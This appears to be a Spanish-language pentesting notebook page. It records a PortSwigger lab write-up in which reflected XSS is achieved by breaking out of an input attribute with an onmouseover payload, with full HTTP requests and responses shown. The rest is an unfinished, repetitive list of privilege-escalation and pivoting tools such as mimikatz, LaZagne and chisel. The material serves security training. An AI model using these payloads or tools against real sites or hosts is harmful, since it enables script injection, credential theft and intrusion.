                        <div class=is-linkback>
        <a href="/">Back to Blog</a>
                        </div>
                    </section>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>
    </body>
</html>



---------

NO SE LOGRA LA INYECCION DEL PAYLOAD POR UNA MEDIDAD E SEGURIDAD POR CODIFICACION:

El HTML codifica caracteres especiales utilizando entidades HTML. En tu payload, los caracteres <, >, y ' están codificados de la siguiente manera:

< se codifica como &lt;
> se codifica como &gt;
' se codifica como &apos;





REQUEST CON PAYLOAD (</h1><script>alert('P4IM0N-XSS')</script>):



GET /?search=</h1><script>alert('P4IM0N-XSS')</script> HTTP/2
Host: 0a6900d60325fb2e82c3ec8200f20038.web-security-academy.net
Cookie: session=KCXh7QYsqFuXFgcuy3GN7h1rUXFmA9Pk
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a6900d60325fb2e82c3ec8200f20038.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8




RESPONSE CON PAYLOAD (</h1><script>alert('P4IM0N-XSS')</script>):




HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 3323

<!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labsBlog.css rel=stylesheet>
        <title>Reflected XSS into attribute with angle brackets HTML-encoded</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>Reflected XSS into attribute with angle brackets HTML-encoded</h2>
                            <a class=link-back href='https://portswigger.net/web-security/cross-site-scripting/contexts/lab-attribute-angle-brackets-html-encoded'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                                <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                    <g>
                                        <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                        <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                    </g>
                                </svg>
                            </a>
                        </div>
                        <div class='widgetcontainer-lab-status is-notsolved'>
                            <span>LAB</span>
                            <p>Not solved</p>
                            <span class=lab-status-icon></span>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <div theme="blog">
            <section class="maincontainer">
                <div class="container is-page">
                    <header class="navigation-header">
                        <section class="top-links">
                            <a href=/>Home</a><p>|</p>
                        </section>
                    </header>
                    <header class="notification-header">
                    </header>
                    <section class=blog-header>
                        <h1>0 search results for '&lt;/h1&gt;&lt;script&gt;alert(&apos;P4IM0N-XSS&apos;)&lt;/script&gt;'</h1>
                        <hr>
                    </section>
                    <section class=search>
                        <form action=/ method=GET>
                            <input type=text placeholder='Search the blog...' name=search value="&lt;/h1&gt;&lt;script&gt;alert('P4IM0N-XSS')&lt;/script&gt;">
                            <button type=submit class=button>Search</button>
                        </form>
                    </section>
                    <section class="blog-list no-results">
                        <div class=is-linkback>
        <a href="/">Back to Blog</a>
                        </div>
                    </section>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>
    </body>
</html>








---------



REQUEST CON PAYLOAD QUE FUNCIONO  (P4IM0N" onmouseover=javascript:alert('P4IM0N-XSS')<!--):



GET /?search=P4IM0N" onmouseover=javascript:alert('P4IM0N-XSS')<!-- HTTP/2
Host: 0a44003a04838d0480d9cc2b004a00f8.web-security-academy.net
Cookie: session=pW7PaffTE9Xl2bLIMjsxyBUn98ObQMql
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a44003a04838d0480d9cc2b004a00f8.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close




RESPONSE CON PAYLOAD QUE FUNCIONO  (P4IM0N" onmouseover=javascript:alert('P4IM0N-XSS')<!--):




HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 3324

<!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labsBlog.css rel=stylesheet>
        <title>Reflected XSS into attribute with angle brackets HTML-encoded</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>Reflected XSS into attribute with angle brackets HTML-encoded</h2>
                            <a class=link-back href='https://portswigger.net/web-security/cross-site-scripting/contexts/lab-attribute-angle-brackets-html-encoded'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                                <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                    <g>
                                        <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                        <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                    </g>
                                </svg>
                            </a>
                        </div>
                        <div class='widgetcontainer-lab-status is-notsolved'>
                            <span>LAB</span>
                            <p>Not solved</p>
                            <span class=lab-status-icon></span>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <div theme="blog">
            <section class="maincontainer">
                <div class="container is-page">
                    <header class="navigation-header">
                        <section class="top-links">
                            <a href=/>Home</a><p>|</p>
                        </section>
                    </header>
                    <header class="notification-header">
                    </header>
                    <section class=blog-header>
                        <h1>0 search results for 'P4IM0N&quot; onmouseover=javascript:alert(&apos;P4IM0N-XSS&apos;)&lt;!--'</h1>
                        <hr>
                    </section>
                    <section class=search>
                        <form action=/ method=GET>
                            <input type=text placeholder='Search the blog...' name=search value="P4IM0N" onmouseover=javascript:alert('P4IM0N-XSS')&lt;!--">
                            <button type=submit class=button>Search</button>
                        </form>
                    </section>
                    <section class="blog-list no-results">
                        <div class=is-linkback>
        <a href="/">Back to Blog</a>
                        </div>
                    </section>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>
    </body>
</html>

CONCLUSION: TUVIMOS QUE IMPLEMENTAR UNA CARGA DEL VALOR P4IM0N PARA QUE SE COMPLETE EN EL VALOR DE VALUE Y CERRAMOS CON " LUEGO PAAR EVITAR EL USO DE CORCHETES ANGULARES(MAYOR Y MEOR QUE), DIRECTAMENTE EJECUTAMOS JAVASCRIPT:ALERT Y LO TERMINAMOS CON UN COMENTARIO POR QUE NOS CARGABA AL ULTIMO UNA CODIFICACION QUE INTERRUMPIA LA EJECUCION DEL PAYLOAD, Y BINGO LO RESOLVIMOS.

⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔

💠 ESCALADA DE PRIVILEGIOS WINDOWS ❌

ESCALADA DE PRIVILEGIOS WINDOWS

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
POWERUP👈 --------------------------------->https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LaZagne👈 --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MIMIKATZ👈 --------------------------------->https://www.kali.org/tools/mimikatz/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROTTENPOTATO👈 --------------------------------->https://github.com/breenmachine/RottenPotatoNG
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINDOWS EXPLOITS SUGGESTER👈 --------------------------------->https://github.com/AonCyberLabs/Windows-Exploit-Suggester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ACCESSCHK👈 --------------------------------->https://github.com/ankh2054/windows-pentest
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PSEXEC👈 --------------------------------->https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINPEAS👈 --------------------------------->https://www.kali.org/tools/peass-ng/ --->https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BLOODHOUND --------------------------------->https://github.com/BloodHoundAD/BloodHound
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EMPIRE POWERSHELL Y LINUX👈 --------------------------------->https://www.kali.org/tools/powershell-empire/ -->https://github.com/EmpireProject/Empire
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RESPONDER👈 --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LOLBAS👈 --------------------------------->https://lolbas-project.github.io/#
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WADCOMS comandos👈 --------------------------------->https://wadcoms.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HIJACKLIBS DLL👈 --------------------------------->https://hijacklibs.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRINTSPOOFER👈 --------------------------------->https://github.com/itm4n/PrintSpoofer
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROGUEWINRM👈 --------------------------------->https://github.com/antonioCoco/RogueWinRM
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINDOWSPRIVESC metodos👈 --------------------------------->https://github.com/debiantano/WindowsPrivesc
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRIV-ESCALATION metodos👈 --------------------------------->https://github.com/KevinLiebergen/priv-escalation
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FILESEC GTFO win y linux👈 --------------------------------->https://filesec.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
POWERSPLOIT👈 --------------------------------->https://www.kali.org/tools/powersploit/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EVIL-WINRM👈 --------------------------------->https://www.kali.org/tools/evil-winrm/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️

🐧 ESCALADA DE PRIVILEGIOS LINUX ❌

ESCALADA DE PRIVILEGIOS LINUX

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LaZagne👈 --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUX KERNEL CVEs👈 --------------------------------->https://www.linuxkernelcves.com/cves
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINENUM👈 --------------------------------->https://github.com/rebootuser/LinEnum
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINPEAS👈 --------------------------------->https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ENUMERACION SMART LINUX👈 --------------------------------->https://github.com/diego-treitos/linux-smart-enumeration
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUXPRIVCHECKER👈 --------------------------------->https://github.com/sleventyeleven/linuxprivchecker
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUX EXPLOIT SUGGESTER👈 --------------------------------->https://github.com/The-Z-Labs/linux-exploit-suggester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CHKROOTKIT👈 --------------------------------->https://github.com/Magentron/chkrootkit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LYNIS👈 --------------------------------->https://github.com/CISOfy/lynis
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
UNIX-PRIVESC-CHECK👈 --------------------------------->https://github.com/pentestmonkey/unix-privesc-check
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRDTYCOW👈 --------------------------------->https://github.com/firefart/dirtycow
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRIV-ESCALATION metodos👈 --------------------------------->https://github.com/KevinLiebergen/priv-escalation
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FILESEC GTFO win y linux👈 --------------------------------->https://filesec.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RESPONDER👈 --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️

♻️ PIVOTING ❌

PIVOTING

SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PROXYCHAINS👈 --------------------------------->https://github.com/rofl0r/proxychains-ng
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCAT👈 --------------------------------->https://nmap.org/ncat/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CHISEL👈 --------------------------------->https://github.com/jpillora/chisel--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CORKSCREW👈 --------------------------------->https://github.com/bryanpkc/corkscrew
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://github.com/rapid7/metasploit-framework
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METERPRETER👈 --------------------------------->https://www.metasploit.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
REGEORG👈 --------------------------------->https://github.com/sensepost/reGeorg
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RPIVOT👈 --------------------------------->https://github.com/klsecservices/rpivot
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀

Last updated 1 year ago

hashtagAUDITORIA DE: ((Laboratorio: XSS reflejado en atributo con corchetes angulares codificados en HTML))

AUDITORIA DE: ((Laboratorio: XSS reflejado en atributo con corchetes angulares codificados en HTML))